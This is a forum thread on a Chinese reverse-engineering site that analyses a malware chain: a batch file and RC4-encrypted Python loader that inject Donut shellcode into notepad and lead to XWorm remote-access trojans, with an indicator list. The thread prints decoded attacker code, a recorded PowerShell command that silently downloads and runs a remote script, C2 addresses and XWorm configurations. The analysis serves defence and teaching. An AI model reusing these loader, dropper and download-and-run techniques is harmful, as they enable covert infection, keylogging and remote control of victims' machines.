吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 6366|回复: 101
上一主题 下一主题
收起左侧

[PC样本分析] 论黑客如何从bat到py到donut到ps1层层包裹木马,揭秘木马神秘运行流程

    [复制链接]
跳转到指定楼层
楼主
ahov 发表于 2025-6-2 14:12 回帖奖励
使用论坛附件上传样本压缩包时必须使用压缩密码保护,压缩密码:52pojie,否则会导致论坛被杀毒软件等误报,论坛有权随时删除相关附件和帖子!
病毒分析分区附件样本、网址谨慎下载点击,可能对计算机产生破坏,仅供安全人员在法律允许范围内研究,禁止非法用途!
禁止求非法渗透测试、非法网络攻击、获取隐私等违法内容,即使对方是非法内容,也应向警方求助!

一、背景

近期发现一枚样本,传播载体为批处理文件(cl.bat),经过分析发现其通过net use命令将某Cloudflare Tunnel内网穿透服务挂载为网络驱动器后,下载并运行其中的恶意Python脚本(yea.py)。该py脚本为典型的ShellCode加载器,通过donut生成的ShellCode二进制经过base64编码+RC4加密两层处理之后在脚本中反序列化加载(调用Windows API VirtualProtect修改内存属性为可读可执行,将解密后的二进制数据强制转换为函数指针,并直接调用函数指针执行内存中的ShellCode),将其ShellCode提取并分析后发现其基于开源项目laZzzy修改,会拉起notepad进行APC早鸟注入,连接C2(95[.]217[.]129[.]88[:]5921)接收指令。
该黑客警惕性高,样本传播12小时后迅速关停了当前使用的Cloudflare Tunnel内网穿透服务和C2。由于分析时C2已离线,通过对威胁情报进行研判发现:
(1)威胁情报信息显示,在连接该C2的样本中发现了另一个Donut ShellCode,对该新发现的ShellCode进行研判后发现其为直接连接该C2XWorm木马 (C2: 95[.]217[.]129[.]88[:]5921; Version: XWorm V5.6)。
(2)威胁情报信息显示,该C2曾下发通过PowerShell下载其他载荷的指令,对此载荷做进一步分析和威胁情报研判后发现该载荷是连接另一个C2XWorm木马 (C2: ftpproxy672-44246[.]portmap[.]io[:]44246)。

二、样本分析

第一节:

[原始样本分析]

原始传播样本cl.bat (0d1323d50ff0496c7ee687d65050b02de85e80b81938d7e1df204ed7320ef7c2)代码如下图所示:

可见网络驱动器挂载地址: \\digital-childrens-junior-cure[.]trycloudflare[.]com@SSL\DavWWWRoot (使用Cloudflare Tunnel内网穿透服务)
代码说明如下图所示:


其下载jaka.zip (96f96b24b16109fb93d65b68c983bb2fa69f07232212437c53d6bb32642f93c3)并解压出yea.py (f27344ae5b14d85975391f8fec471ee806e85568c6d87ac835693b47a7bacfad),使用jaka.zip内携带的Python环境启动,执行其中的代码。

jaka结构如下图所示:

yea.py代码如下图所示:

yea.py代码中可以看到:
(1) 该脚本先对字符串中的数据进行base64解码,赋值给变量GWFiawqTIgMLwbSqDwRGMzYOKXbSpnYm.
(2) 将ASCII编码的xWp0LaAO字符串和base64解码后的数据作为参数传入函数IxcXpWUvfBDATqvXtEqdwbKpAovJwfdU,将函数返回结果赋值给变量FiCSYrhwEzAKhYhvZqAiVpGrlYwsnuOS.
现在分析函数IxcXpWUvfBDATqvXtEqdwbKpAovJwfdU,其内部有一个变量IluiDvLCpTJsFOJzDLmyyyqiaMhVyKFm初始化了为一个长度为256的列表,值从0255,用于定义一个S盒,初始化S盒等状态向量,为后续执行RC4KSA(密钥调度算法)步骤做准备,然后将变量RuEZdSDXxJAkVRPopNlDpUedgxdYQnZp初始化为0.
代码中有两个循环。
第一个for循环遍历0255,通过密钥对状态向量进行置换,对S盒进行打乱。
至此,符合RC4KSA(密钥调度算法)
在第二个循环中,变量aAKfNgohZOMShFLCIxwMcIHnbLjFjhZxRuEZdSDXxJAkVRPopNlDpUedgxdYQnZp重新初始化为0。然后,对于数据中的每个字节,进行索引的更新、交换状态向量,并生成一个密钥流字节UVNOGXlIDSmoOkzXydluvTrriPJYzdEm。最后,将输入的数据字节与该密钥流字节进行异或操作,将结果添加到结果字节数组中,得到解密后的数据,最后返回解密后的字节。
至此,符合RC4PRGA(伪随机生成算法)
xWp0LaAO字符串密文的则是解密密钥。
因此,黑客使用RC4加密算法(密钥: xWp0LaAO)对恶意二进制数据进行了加密,再将密文进行了base64编码,然后存储至该Python脚本中,实现了序列化存储。

解密步骤:
法一:先将base64数据解码,再进行RC4解密(密钥: xWp0LaAO)。解密后可得到一个通过开源项目Donut生成的ShellCode二进制
法二:由于最终解密后的数据赋值给了变量FiCSYrhwEzAKhYhvZqAiVpGrlYwsnuOS,直接修改其源代码保存解密后的数据

继续向下看,可以看到: 脚本执行了ctypes.create_string_buffer(FiCSYrhwEzAKhYhvZqAiVpGrlYwsnuOS)将解密后的数据写入到内存缓冲区,然后执行ctypes.windll.kernel32.VirtualProtect调用Windows API VirtualProtect修改内存属性为可读可执行,其中0x40是内存保护标志,表示允许读写和执行。
然后继续执行:

pEoiTsJphfEBjJLbNFXEMvdPdvfdmibC = ctypes.cast(IvBappaUBLSolqUdSbrJfGzprBgfHtdr, ctypes.CFUNCTYPE(ctypes.c_void_p))  # 将缓冲区转换为函数指针
pEoiTsJphfEBjJLbNFXEMvdPdvfdmibC()  # 执行内存中的代码

将解密后的二进制数据强制转换为函数指针,直接调用函数指针执行内存中的ShellCode.

我们提取并保存解密后的数据,发现其为Donut生成的ShellCode (7f48d92abd37c4c2d1ced2a850de9ff6a9b8f31113e1853a26c0d7968ae14573),如下图所示:

我们使用开源项目将该Donut ShellCode加载的内容解密,得到可供分析的可执行文件 (11a2ac0a4953482356f338ae02e110e13b6eb9b8dad1b6a1152fba7bd1d306f9) [1],如下图所示:

静态分析后发现,样本的输出信息毫不遮掩,向我们呈现出许多输出内容和字符串,显示其具备ShellCode加载、Payload解密和注入器等功能且具有多种注入方式,如下图所示:




以上信息展示出样本是一个成熟的ShellCode加载器和注入器,样本我们比对了样本中出现的字符串、输出信息和函数功能,确认该样本基于开源项目laZzzy修改。开源项目laZzzy支持的ShellCode执行技术包括但不限于:

1. Early-bird APC Queue (requires sacrificial process)    // 早鸟APC队列注入
2. Thread Hijacking (requires sacrificial process)    // 线程劫持
3. KernelCallbackTable (requires sacrificial process that has a GUI)
4. Section View Mapping
5. Thread Suspension    // 线程挂起
6. LineDDA Callback
7. EnumSystemGeoID Callback
8. Fiber Local Storage (FLS) Callback
9. SetTimer
10. Clipboard

如下图所示:

可以看到,该开源项目所具有的功能和支持的注入方式与上述的样本静态分析结果完全一致。

同时,样本命中了社区Yara规则HKTL_LaZzy_Loader_Nov22_1,进一步佐证了其基于开源项目laZzzy修改,如下图所示:

动态分析后发现,样本运行后会拉起notepad进行APC早鸟注入。其将目标进程内存属性由可读可写(Read-Write)修改为可读可执行(Read-Execute),修改目标进程的APC队列,将恶意代码注入其中,远程注入notepad进程,如下图所示(图左为基于ETW-TI的行为监控工具,右图为执行样本以及样本的返回和输出,二者相吻合,结论相一致):

notepad进程被注入后会不断尝试与远程地址95[.]217[.]129[.]88[:]5921建立TCP连接,如下图所示:

[关联样本研判1]

由于C2已经离线,我们在VirusTotal平台上通过IP 95[.]217[.]129[.]88的威胁情报发现了与之相关联的另一个Donut ShellCode (2ad007f1bb1668e52e096d1bde95e57f1a2a2cfdd42fe37411963e131adf2fd0),解密后关联到样本8d937db7e89980ba45a77f3f0a09cc7898c01c1991f85dd052d93783aad88bd9. 从当时的动态运行结果可以证实其为XWorm木马,且版本为XWorm V5.6,样本配置为:

{'XWorm': {'Sleep': [3], 'Hosts': ['95.217.129.88'], 'Port': ['5921'], 'KEY': ['<123456789>'], 'SPL': ['<Xwormmm>'], 'Groub': ['XWorm V5.6'], 'USBNM': ['USB.exe'], 'Mutex': ['MZL6j42k9OgGAoZY']}}
{"C2 url": ["95.217.129.88"], "Port": 5921, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

如下图所示:

https://static.52pojie.cn/static/image/hrline/2.gif

第二节:

[关联样本研判2]

[1] 对于第一节中的原始样本分析,由于根据解密方式的不同,得到的文件可能略有差异——Hash不同,但总体相同。我们在VirusTotal威胁情报平台上观察到另一份与之相关联的由该ShellCode解密得到的可执行文件 (964f5015772aa4a6cf67b083648ba56625221cc8892e861a39351a977bfa6150)。如下图所示:

PE结构对比,如下图所示:

强调该文件是由于该文件在VirusTotal威胁情报平台中的Microsoft Sysinternals沙盒运行时C2存活并下发了执行PowerShell命令的指令,被沙盒有效记载,由于C2目前已经离线,因此其具有较高的威胁情报价值。
我们可以在Shell CommandsProcesses Tree信息中观察到PowerShell被拉起时的进程树,并看到其执行的命令行信息和PowerShell命令,如下图所示:

可以看到其通过PowerShell静默下载并执行https[:]//files.catbox[.]moe/69b44f[.]ps1脚本 (d03a44e92a67dbb9bb6befdd2c0b3c7844e9f64fb847eff6bbc1ad09d679e273)。

我们将该脚本下载后,可以看到脚本中的变量${IndianiqsqDChtlS}由多个编码片段拼接而成,如下图所示:


对于第一组编码数据,我们猜测为Hex数据,开头部分数据为: 0x54, 0x56, 0x71, 0x51, 0x41, 0x41, 0x4d, 0x41, 0x41, 0x41, 0x41, 0x45, 0x41, 0x41, 0x41, 0x41, 0x2f, 0x2f,将其转换为字符串后为: TVqQAAMAAAAEAAAA//,再讲该字符串进行base64解码后就会得到Windows PE文件的MZ头,因此该脚本通过base64编码+Hex编码序列化存储了一个二进制可执行文件。如下图所示:


由于脚本中多个部分使用不同的编码方法,并且拆得非常零散,如果一个一个手动进行解码再拼接工作量大且十分复杂,我们直接滑动到脚本底部查看其拼接、反序列化和释放并写入文件的部分。

分析脚本底部的部分变量:
PowerShell中反引号 是转义字符,变量名中的反引号不会影响实际变量名,反引号在PowerShell中用来转义特殊字符,所以这里可能是在故意混淆变量名,让分析变得困难。 对于变量${InDIankpMjbYeDtf}`,可以看到赋值的内容是`[sYstEm.iO.PAtH]::gEtTemPpath()`,即获取系统临时目录并赋值。 对于变量`$indIanRJLztrDfju,可以看到赋值的内容末尾是.exe,其在拼接exe文件的所在目录(${indiankPMJByEDtf}`)和文件名(`{InDianwuCrZjtWnS}.exe`),即文件路径,并赋值。 对于变量`${IndIanadZvBsCmdZ},可以看到赋值内容末尾是.bat,其在拼接批处理文件的所在目录({inDiankpmjbyEDtf})和文件名(${IndIanWucrZjtWnS}.bat`),即文件路径,并赋值。 对于变量`${InDianXtLIjxmcWX}`,可以看到其赋值的内容是拼接出来的批处理命令:

@echo off`ntimeout /t 2 /nobreak>nul`ndel `"$InDianrJLztrDfJu`" /f /q`nexit

再解密[char]表达式——
对于表达式:

[char]((19002 - 9867 - 3089 - 5968))+[char](((980 -Band 7475) + (980 -Bor 7475) - 17 - 8337))+[char]((-3995 - 2033 - 2118 + 8265))+[char]((-1228 - 4793 + 4838 + 1228))+[char](((-12598 -Band 5996) + (-12598 -Bor 5996) + 1865 + 4816))+[char](((-3392 -Band 2765) + (-3392 -Bor 2765) + 2332 - 1607))+[char](((-16650 -Band 2904) + (-16650 -Bor 2904) + 9290 + 4562))+[char]((-3687 - 6737 + 1379 + 9146))+[char](((-6385 -Band 2400) + (-6385 -Bor 2400) + 9609 - 5525))+[char](((8580 -Band 8726) + (8580 -Bor 8726) - 9299 - 7891))

解密结果为: New-Object

对于表达式:

[char](((-3042 -Band 9181) + (-3042 -Bor 9181) - 5054 - 1002))+[char](((-7205 -Band 6236) + (-7205 -Bor 6236) - 2366 + 3451))+[char]((-8213 - 1056 + 8357 + 1009))+[char](((-6809 -Band 7938) + (-6809 -Bor 7938) - 215 - 800))+[char](((-4455 -Band 4808) + (-4455 -Bor 4808) + 3896 - 4133))+[char](((485 -Band 1549) + (485 -Bor 1549) - 2869 + 880))+[char](((5055 -Band 498) + (5055 -Bor 498) - 4931 - 542))+[char]((8030 - 4044 - 2553 - 1319))+[char]((-15464 - 2385 + 9245 + 8715))+[char](((-8969 -Band 8206) + (-8969 -Bor 8206) - 3948 + 4810))+[char](((-10583 -Band 9149) + (-10583 -Bor 9149) + 8015 - 6480))+[char](((10950 -Band 1116) + (10950 -Bor 1116) - 5894 - 6057))+[char]((10835 - 5184 - 2482 - 3054))

解密结果为: Start-Process

如下图所示:

我们将第一条[char]表达式解密后代入原代码,发现其使用System.Diagnostics.ProcessStartInfo启动静默无窗口该可执行文件:

${inDiangcPYCWauLx}=New-Object System.Diagnostics.ProcessStartInfo;${`In`Dian`G`CPYcwa`ULX}.FIleNAme=$inDIanRJLztrDfJU;${ind`Iang`Cp`YCwa`UL`X}.CrEaTEnOwIndoW=([bOol][CHaR]);${in`Diangc`Py`Cwau`LX}.WindOwstYLE=0;${ind`IangtCsik`Ocrc}=[syStem.diAGNOstIcs.pRoCeSS]::sTaRt(${inDIangcPyCWaulx})

代码说明如下:

# 创建 ProcessStartInfo 对象 (变量名混淆: inDiangcPYCWauLx)
${inDiangcPYCWauLx} = New-Object System.Diagnostics.ProcessStartInfo

# 设置要执行的程序路径,来自变量 $inDIanRJLztrDfJU 的值
# 变量名混淆: `In`Dian`G`CPYcwa`ULX
# 实际对应: ${inDiangcPYCWauLx}.FileName = $inDIanRJLztrDfJU
${`In`Dian`G`CPYcwa`ULX}.FIleNAme = $inDIanRJLztrDfJU

# 设置不创建新窗口 (通过字符强制类型转换设置布尔值 [生成 $true])
# [char] 空值被转换为布尔值 $true
# 变量名混淆: ind`Iang`Cp`YCwa`UL`X; 方法名混淆: CrEaTEnOwIndoW ...
# 实际对应: ${indIangCpYCwaULX}.CreateNoWindoW = ([bool][char])
${ind`Iang`Cp`YCwa`UL`X}.CrEaTEnOwIndoW = ([bOol][CHaR])

# 设置窗口样式为隐藏 (0 = Hidden)
# 变量名混淆: in`Diangc`Py`Cwau`LX; 方法名混淆: WindOwstYLE
# 实际对应: ${inDiangcPyCwauLX}.WindowStyle = 0
${in`Diangc`Py`Cwau`LX}.WindOwstYLE = 0

# 启动配置好的进程
# 变量名混淆: indIangtCsikOcrc; 方法名混淆:sTaRt ...
# 实际对应: ${indIangtCsikOcrc} = [System.Diagnostics.Process]::Start(${inDIangcPyCWaulx})
# 实际调用: System.Diagnostics.Process.Start()
${ind`IangtCsik`Ocrc} = [syStem.diAGNOstIcs.pRoCeSS]::sTaRt(${inDIangcPyCWaulx})

我们将第二条[char]表达式解密后代入原代码,继续看到末尾的部分代码:

Start-Process -FilePath ([syStem.TeXt.enCoDing]::utf8.GETSTRing((99, 109, 100, 46)) + [SYSTeM.TExt.eNcOdInG]::UTf8.GEtstRinG((0x65, 0x78, 0x65))) -ArgumentList "/c ${indianadZvBSCMDZ}" -WindowStyle Hidden

对于Dec 99, 109, 100, 46,我们对照ASCII码表可得结果:
Dec 99 => c
Dec 109 => m
Dec 100 => d
Dec 46 => .

对于Hex 0x65, 0x78, 0x65,我们将其转换为字符串后确认为exe,如下图所示:

可见,脚本末尾执行了:

Start-Process -FilePath cmd.exe -ArgumentList "/c ${indianadZvBSCMDZ}" -WindowStyle Hidden

静默无窗口执行,以f"cmd.exe /c ${indianadZvBSCMDZ}"命令行启动cmd执行bat文件,其中${indianadZvBSCMDZ}bat文件路径。

结合上述分析,该脚本通过使用System.Diagnostics.ProcessStartInfo启动该可执行文件,然后通过PowerShell.exe拉起cmd.exe执行其下放的批处理文件来删除该可执行文件,并退出环境。

根据以上分析,我们修改以上相关脚本末尾代码,将该可执行文件安全写入至当前目录且不执行(去除启动并执行代码,使其生成后不执行):

# 原始混淆变量定义(路径生成部分修改为当前目录)
${In`DIankpMjb`YeDtf} = [System.Environment]::CurrentDirectory  # 修改点:临时目录=>当前目录
$indIanRJLztrDfju = "${In`DIankpMjb`YeDtf}\${In`Dianwu`Cr`ZjtWnS}.exe"  # 修改点:路径拼接

# 原始字节写入逻辑(完全保留)
[IO.File]::WriteAllBytes($indIanrjlztrdfJu, ${indIanrvtnOLJbYg})

# 原始.bat文件生成逻辑(完全保留)
${IndIanadZvBsCmdZ} = "${In`DIankpMjb`YeDtf}\${`IndIan`Wucr`Zjt`Wn`S}.bat"
${In`Dian`XtL`Ijxmc`W`X} = @"
@echo off
timeout /t 2 /nobreak>nul
del "$indIanrJLztrDfJu" /f /q
exit
"@

# 原始字节写入逻辑(完全保留)
[IO.File]::WriteAllText(${IndIanaDz`VbScmdz}, ${`IndIanxtL`IjX`Mcwx})

# 输出生成的文件信息
Get-Item $indIanrjlztrdfJu, ${IndIanaDz`VbScmdz} |
   Select Name, Directory, Length

于是,保存脚本并运行后,我们得到了 QYIFWA.bat (QYIFWA.exe启动器) 和 QYIFWA.exe (8b68728d3054a0f23ea137c6e6710dbc795b053fde677dc511c176a61286cc20),如下图所示:

QYIFWA.exe使用VB.NET编译,使用OneDrive图标,原始文件名为OneDrive.exe,其使用了多层代码壳或混淆器,静态分析难度较高。
直接对其进行反编译可以看到如下internal class: BabelObfuscatorAttribute CrytpoObfuscator ObfuscatedByGoliath Reactor VMProtect等。
de4dot识别到两种混淆器——Babel .NETGoliath.NET,但无法完成脱壳和去混淆处理。
其命中两条社区Yara规则: SUSP_OBFUSC_Goliath_Obfuscator_Oct20_1+SUSP_MSIL_NET_ConfuserEx_Module_Encryption_Sep23.
PE节区名: 节(0)-xbS4;{; 节(1)-.text; 节(2)-.rsrc; 节(3)-UPX; 节(4)-.reloc.
如下图所示:




其会尝试通过多种方式检测并反虚拟机、反调试器、反虚拟行为沙盒。
由于在本地分析环境中无法运行该样本,故结合云端沙箱的动态运行结果进行分析。
(1) 检查VMware相关文件和注册表,如下图所示:





(2) 检查VirtualBox相关文件和注册表,如下图所示:





(3) 检查注册表中BIOS版本,如下图所示:




(4) 检查注册表中SCSI接口磁盘ID,如下图所示:




(5) WMIQuery检查当前环境(包括但不限于查询Win32_VideoController Win32_OperatingSystem AntivirusProduct等)*,如下图所示:

(6) 查询系统硬盘大小,如下图所示:

(7) 通过检查SeDebugPrivilege权限等方式检查自身是否被调试,如下图所示:

(8) 查询CPU核心数量、计算机名、用户名,如下图所示:

  • 我们同时观察到其启动后加载的COM类如下:
    CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA - WbemDefaultPathParser
    4590F811-1D3A-11D0-891F-00AA004B2E24 - WBEM Locator
    4590F812-1D3A-11D0-891F-00AA004B2E24 - Microsoft WBEM WbemClassObject Marshalling proxy
    8BC3F05E-D86B-11D0-A075-00C04FB68820 - Windows Management and Instrumentation
    7C857801-7381-11CF-884D-00AA004B2E24 - PSFactoryBuffer
    D68AF00A-29CB-43FA-8504-CE99A996D9EA - Microsoft WBEM (non)Standard Marshaling for IWbemServices
    E7D35CFA-348B-485E-B524-252725D697CA - PSFactoryBuffer
    1B1CAD8C-2DAB-11D2-B604-00104B703EFD - Microsoft WBEM (non)Standard Marshaling for IEnumWbemClassObject

    这些COM类与WMI相关。

本地分析环境下发现当其检测到虚拟机环境时,会执行cmd.exe /c "color 03 && echo This assembly can't be executed on virtual machines! && pause,然后自退出,如下图所示:


启动后其会将自身复制到C:\Users\Public\OneDrive Updater.exe启动,并添加至注册表启动项HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive Updater处,如下图所示:




调用SetWindowsHookExW API安装Windows键盘记录消息钩子,如下图所示:


查阅文档后可确认,"idHook":"0xd"(Hex 0xd == 13)对应的Value为WH_KEYBOARD_LL,即安装用于监视低级别键盘输入事件的挂钩过程,如下图所示:

不断尝试与远程地址ftpproxy672-44246[.]portmap[.]io[:]44246建立TCP连接,如下图所示:

[关联样本研判3]

由于C2已经离线,我们在VirusTotal平台上通过ftpproxy672-44246[.]portmap[.]io的威胁情报发现了与之相关联的另一个行为相似度较高的样本(80b781f119e4c123ce0c9829bcf6423235e17cc889b857048552434e5d78cb48). 从当时的动态运行结果可以证实其为XWorm木马,样本配置为:

{"C2 url": ["ftpproxy672-44246.portmap.io"], "Port": 44246, "Aes key": "|||IIllIIll|||lllIIll$913\\|}{!39", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

如下图所示:

三、附录

[IOC]
网络驱动器: digital-childrens-junior-cure[.]trycloudflare[.]com
C&C:
95[.]217[.]129[.]88[:]5921
ftpproxy672-44246[.]portmap[.]io[:]44246
Hash (以SHA-256计):
cl.bat - 0d1323d50ff0496c7ee687d65050b02de85e80b81938d7e1df204ed7320ef7c2
jaka.zip - 96f96b24b16109fb93d65b68c983bb2fa69f07232212437c53d6bb32642f93c3
yea.py - f27344ae5b14d85975391f8fec471ee806e85568c6d87ac835693b47a7bacfad
7f48d92abd37c4c2d1ced2a850de9ff6a9b8f31113e1853a26c0d7968ae14573
11a2ac0a4953482356f338ae02e110e13b6eb9b8dad1b6a1152fba7bd1d306f9
964f5015772aa4a6cf67b083648ba56625221cc8892e861a39351a977bfa6150
2ad007f1bb1668e52e096d1bde95e57f1a2a2cfdd42fe37411963e131adf2fd0
8d937db7e89980ba45a77f3f0a09cc7898c01c1991f85dd052d93783aad88bd9
69b44f.ps1 - d03a44e92a67dbb9bb6befdd2c0b3c7844e9f64fb847eff6bbc1ad09d679e273
QYIFWA.exe - 8b68728d3054a0f23ea137c6e6710dbc795b053fde677dc511c176a61286cc20
80b781f119e4c123ce0c9829bcf6423235e17cc889b857048552434e5d78cb48

免费评分

参与人数 70吾爱币 +73 热心值 +65 收起 理由
StefanWhite + 1 + 1 我很赞同!
YukiACG + 1 + 1 我很赞同!
抱歉、 + 1 用心讨论,共获提升!
VWF + 1 + 1 解析透彻,感谢分享分析思路!
chawlau + 1 + 1 谢谢@Thanks!
桃白白123 + 1 + 1 我很赞同!
igb + 1 + 1 我很赞同!
神奇的人鱼 + 1 + 1 我很赞同!
Mark2022 + 1 谢谢@Thanks!
3xsh0re + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
BeginForEnd + 1 + 1 用心讨论,共获提升!
独行剑侠 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
n0napn0life + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
Oldpit + 1 很厉害
wuaipojie00001 + 1 + 1 谢谢@Thanks!
gengxiliang + 1 + 1 楼主真的牛!!
dgewei + 1 + 1 我很赞同!
树下彩虹025 + 2 谢谢@Thanks!
Tusimple + 1 + 1 热心回复!
A_DUST + 1 + 1 谢谢@Thanks!
wepfree + 1 + 1 描述的这么详细,楼主用心之深值得大家学习,赞
theStyx + 1 + 1 用心讨论,共获提升!
qazwert + 1 + 1 谢谢@Thanks!
danielau + 1 + 1 用心讨论,共获提升!
fengbolee + 2 + 1 用心讨论,共获提升!
icespider + 1 + 1 我很赞同!
xywy + 1 + 1 谢谢@Thanks!
daxz + 1 + 1 谢谢@Thanks!
杨辣子 + 1 + 1 鼓励转贴优秀软件安全工具和文档!
kimfor168 + 1 图文并茂!
wuai920981023 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
Daby + 1 用心讨论,共获提升!
gugouo163 + 1 + 1 用心讨论,共获提升!
af8889 + 1 + 1 我很赞同!
HakureiYuyuko + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
lsb2pojie + 1 + 1 谢谢@Thanks!
jinlide1101 + 1 + 1 谢谢@Thanks!
落香电脑 + 1 + 1 我很赞同!
真的小白 + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
uoyleef + 1 + 1 我很赞同!
dizzy0001 + 1 + 1 谢谢@Thanks!
唯爱不朽 + 2 + 1 有没有大佬可以帮忙分析下这个木马样本,艾特我一下 https://wwra.lanzoub. ...
linsixi + 1 大神不得了的厉害
lwGoodChinese + 1 + 1 用心讨论,共获提升!
allspark + 1 + 1 用心讨论,共获提升!
ImrPZ + 1 + 1 我很赞同!
iuya + 1 + 1 欢迎分析讨论交流,吾爱破解论坛有你更精彩!
cy51168 + 1 + 1 感谢发布原创作品,吾爱破解论坛因你更精彩!
longxy001 + 1 + 1 我很赞同!
小小超 + 1 + 1 用心讨论,共获提升!
chujiu52PJ + 1 + 1 我很赞同!
qmsy273 + 1 我很赞同!
gxsky + 2 + 1 全力支持技术人才!!!
ztw36343153 + 1 + 1 我很赞同!
Carinx + 1 + 1 用心讨论,共获提升!
slslsl + 1 + 1 热心回复!
kexing + 1 + 1 谢谢@Thanks!
surepj + 1 + 1 用心讨论,共获提升!
IcePlume + 1 + 1 我很赞同!
CarRoad + 1 + 1 谢谢@Thanks!
laozhang4201 + 1 + 1 学习学习,谢谢分享。
qq63 + 1 + 1 谢谢@Thanks!
Bluesky10 + 1 + 1 热心回复!
tutu2 + 1 + 1 不明觉厉 佩服佩服
Arcticlyc + 2 + 1 用心讨论,共获提升!
浮影 + 1 我很赞同!
qq465881818 + 1 + 1 我很赞同!
半醉半醒花前坐 + 3 + 1 用心讨论,共获提升!
ehu4ever + 1 + 1 我很赞同!
Bayonet + 1 + 1 不明觉厉!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

推荐
 楼主| ahov 发表于 2025-6-3 16:06 |楼主
追风营销 发表于 2025-6-3 11:16
py没环境怎么运行的

jaka.zip里面携带了一个便携式Python环境的(或者说嵌入式Python环境),你看jaka.zip文件结构图,除了恶意脚本yea.py以外的文件都是其准备的Embed Python环境,里面有python313.zip python.exe pythonw.exe python3.dll python313.dll python313._pth vcruntime140.dll *.pyd等等等等文件,这些就是他的Embed Python环境。
cl.bat会把jaka.zip下载到本地目录%USERPROFILE%\\contacts\\jaka.zip,再全部解压到%USERPROFILE%\\contacts中,在该目录中依次执行命令:
python.exe yea.py
python.exe 2.py (在本次截获样本中Not Found)
python.exe 3.py (在本次截获样本中Not Found)
python.exe 4.py (在本次截获样本中Not Found)
你仔细看文章,写得很明白了。
沙发
tutu2 发表于 2025-6-2 20:27
给不了解XWorm木马的坛友们 科普一下:
X 蠕虫(XWorm)
X 蠕虫是一种恶意程序,它使网络犯罪分子能够远程控制受感染的计算机。它首次出现于 2022 年 7 月,可以收集广泛的敏感信息,包括财务细节、浏览历史记录、保存的密码以及加密货币钱包数据。
X 蠕虫允许攻击者通过跟踪击键、捕获网络摄像头图像、监听音频输入、扫描网络连接以及查看打开的窗口来监控受害者的活动。它还可以访问和操作计算机的剪贴板,有可能窃取加密货币钱包凭证。
3#
jellycici 发表于 2025-6-2 22:38
小白经过......这么详细的分析,厉害了,收藏学习学习
4#
twl288 发表于 2025-6-3 00:11
太厉害了,黑客啊
5#
让导弹飞 发表于 2025-6-3 00:32
这么复杂吗
6#
Malese 发表于 2025-6-3 01:12
一眼望不到头,看着好复杂啊,得收藏慢慢学了,感谢大佬的分享了
7#
CYC0622 发表于 2025-6-3 05:03
看完后只觉得楼主比黑客还厉害
8#
CarRoad 发表于 2025-6-3 06:16
感谢大佬分享,收藏学习
9#
IcePlume 发表于 2025-6-3 07:18
太复杂了,普通用户还是得从源头上多加提防,不要乱下东西
10#
Flytom 发表于 2025-6-3 08:35
凤毛麟角的级别可不是吹的佩服
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2025-6-15 15:03

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表